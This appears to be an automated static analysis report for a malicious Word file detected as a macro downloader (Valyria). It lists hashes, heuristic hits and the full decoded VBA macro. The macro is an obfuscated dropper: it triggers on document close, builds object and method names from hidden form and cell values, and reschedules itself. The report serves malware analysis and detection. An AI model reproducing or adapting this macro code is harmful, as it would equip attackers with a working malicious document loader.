Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0dae85d177f34e18…

MALICIOUS

Office (OOXML)

82.3 KB Created: 2021-01-29 12:36:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 94c3df70fd6bab66ddb887135cce5653 SHA-1: 877178d56cdbdbb161853d1dbae76f0feea16d46 SHA-256: 0dae85d177f34e18d28e33d6ae47f0e49b49796d9cf32fec028fd733a54f639d
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ep = CreateObject(UserForm1.at & UserForm1.v2)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set ic = CallByName(ep.Workbooks, UserForm1.fm & UserForm1.g5, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6926 bytes
SHA-256: bdcaf6d799450d6569f47039b93f26896747a9c79cf87c255f639ff35a3a633b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public om, eb, ek, dn, rb, ep, i5, pf, u, ysv, lz, pw, mz, kh, pq, cw

Sub Document_Close()

bp

End Sub

Sub bp()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set ep = CreateObject(UserForm1.at & UserForm1.v2)

ep.DisplayAlerts = False

rq = UserForm2.ComboBox19

ydm = 1301

ck = 0

Err.Number = 0

qf = UserForm2.ComboBox26

While ydm <> 0 And ck < 32

Set ic = CallByName(ep.Workbooks, UserForm1.fm & UserForm1.g5, 1, UserForm2.ComboBox1, , , , UserForm1.rf)

ydm = Err.Number

ck = ck + 16

Wend

If ydm <> 0 Then

ErrHandler:

x9j = CallByName(Application, UserForm1.na & UserForm1.o1, 2)

If x9j <> False Then

qs = UserForm2.ComboBox27

Set j0 = CreateObject(UserForm1.s0v & UserForm1.jo)

CallByName j0.Documents, UserForm1.fm & UserForm1.g5, 1, ActiveDocument.FullName, , True

CallByName j0, UserForm1.dx & UserForm1.zx, 1, Now + TimeSerial(0, 0, 2), UserForm1.dr & UserForm1.l2 & "bp"

ib = UserForm2.ComboBox15

Else

CallByName Application, UserForm1.dx & UserForm1.zx, 1, Now + TimeSerial(0, 0, 17), UserForm1.dr & UserForm1.l2 & "bp"

qq = UserForm2.ComboBox15

End If

ep.Quit

Exit Sub

End If

Dim ov

Set ov = ep.sheets(1)

lr = "'"

cw = ep.sheets(5).Cells(1, 1)

If Len(cw) < 1 Then

If ep.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

qh = UserForm2.ComboBox7

End If

End If

qu = ov.Cells(78, 24).Value

l4 = ov.Cells(7, 14).Value

ysv = ov.Cells(8, 33).Value

lz = ep.sheets(2).Cells(142, 2).Value

rb = ep.sheets(2).Cells(80, 49).Value

v7b = ep.sheets(2).Cells(142, 60).Value

da = ov.Cells(81, 8).Value

dk = UserForm2.ComboBox11

k9 = ep.sheets(3).Cells(52, 45).Value

el = ep.sheets(2).Cells(50, 18).Value

d0 = ep.sheets(1).Cells(29, 52).Value

td = UserForm2.ComboBox7

mz = ep.sheets(2).Cells(73, 8).Value

i5 = ov.Cells(5, 36).Value

u = ep.sheets(3).Cells(87, 42).Value

ih = UserForm2.ComboBox12

iin = ep.sheets(3).Cells(31, 12).Value

b1 = ep.sheets(2).Cells(44, 36).Value

pw = ov.Cells(53, 50).Value

ag = ep.sheets(1).Cells(149, 47).Value

r1 = ep.sheets(2).Cells(145, 35).Value

om = ep.sheets(3).Cells(131, 27).Value

mj = UserForm2.ComboBox9

ns = ep.sheets(3).Cells(69, 40).Value

r4 = UserForm2.ComboBox12

j4 = ep.sheets(1).Cells(116, 32).Value

pf = ep.sheets(3).Cells(22, 10).Value

eb = ep.sheets(3).Cells(138, 35).Value

et = ep.sheets(3).Cells(56, 26).Value

nj = ep.sheets(2).Cells(63, 33).Value

pq = ""

Set Sh1 = ep.sheets(4)

du = 1

fk = UserForm2.ComboBox9

ot = True

While ot

eg = Sh1.Cells(du, 1).Value

If Len(eg) < 1 Then

ot = False

Else

pq = pq & eg

End If

du = du + 1

Wend

ris = CallByName(ep, d0, 2)

UserForm1.d9.Value = da & ris & r1

ro = UserForm2.ComboBox15

UserForm1.ab.Value = l4

xi8 = UserForm2.ComboBox20

CallByName CreateObject(nj), j4, 1, UserForm1.d9, ag, UserForm1.ab

Set v8 = CreateObject(qu)

g8 = UserForm2.ComboBox6

Set ku = CallByName(v8, v7b, 2)

h8 = UserForm2.ComboBox20

Set vo = CallByName(ku, et, 1)

Set u = CallByName(v8, u, 2)

Set dn = v8

UserForm5.ComboBox1 = "mw"

Set om = CallByName(kh, om, 2)

pf = CallByName(om, pf, 2)

UserForm1.iy.Value = ns & k9

UserForm3.ComboBox1 = el

vu = UserForm2.ComboBox15

UserForm1.iy.Value = iin

fx = UserForm2.ComboBox4

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = pf

v8 = kv

dv = UserForm2.ComboBox6

ic = i9

eo = UserForm2.ComboBox16

ov = ie

ku = go

vo = kr

u = gd

ysv = ly

lz = kc

kh = m5r

om = aq

dn = ct

DoEvents

CallByName ep, b1, 1

ep = g4

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{83B86C37-8283-40E9-903B-7C14AF8652BB}{05C5F207-1DF7-41EE-B0C4-323134FC4640}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{32A4A80D-1638-45FF-9C38-C7E873ADB834}{77C707F6-A55D-4D2C-9151-22F8CD607BC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 

ym4 = UserForm2.ComboBox7

 

 g0 = UserForm2.Controls.Count - 1
 
 
 

h1 = UserForm2.ComboBox4

 

 au = ""
 For ig = 1 To g0 Step 2
 au = au & UserForm2.Controls.Item(ig)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem au
 ComboBox1.AddItem "gz"
 
 

f5 = UserForm2.ComboBox18

 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{7D752832-5ED9-4F91-A7EC-1E463377426B}{F5288B81-00F2-4D75-BE4A-085AF8167D88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.om, ActiveDocument.i5, VbMethod, 1, ActiveDocument.pf
 CallByName ActiveDocument.om, ActiveDocument.eb, VbMethod, UserForm1.iy.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{217A3628-D901-4E41-8B58-B223A6080933}{9EB52867-F2D1-4F68-A4B2-59B57F58FC9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.dn, ActiveDocument.rb, VbMethod, UserForm1.iy.Value, ActiveDocument.pq, ActiveDocument.cw
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5E673E03-02C2-4882-B433-0657DBBED600}{2A10DA8D-51F4-4F22-98AB-9EEAEC21B4CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ysv = CallByName(ActiveDocument.u, ActiveDocument.ysv, VbGet)
 Set ActiveDocument.lz = CallByName(ActiveDocument.ysv, ActiveDocument.lz, VbGet)
 Set ActiveDocument.kh = CallByName(ActiveDocument.lz, ActiveDocument.pw, VbMethod, ActiveDocument.mz)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 50688 bytes
SHA-256: 7db12c1f59d1673b48709aa10f3afec8e8fa62fb682fa8be4eeaa075985d636b
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.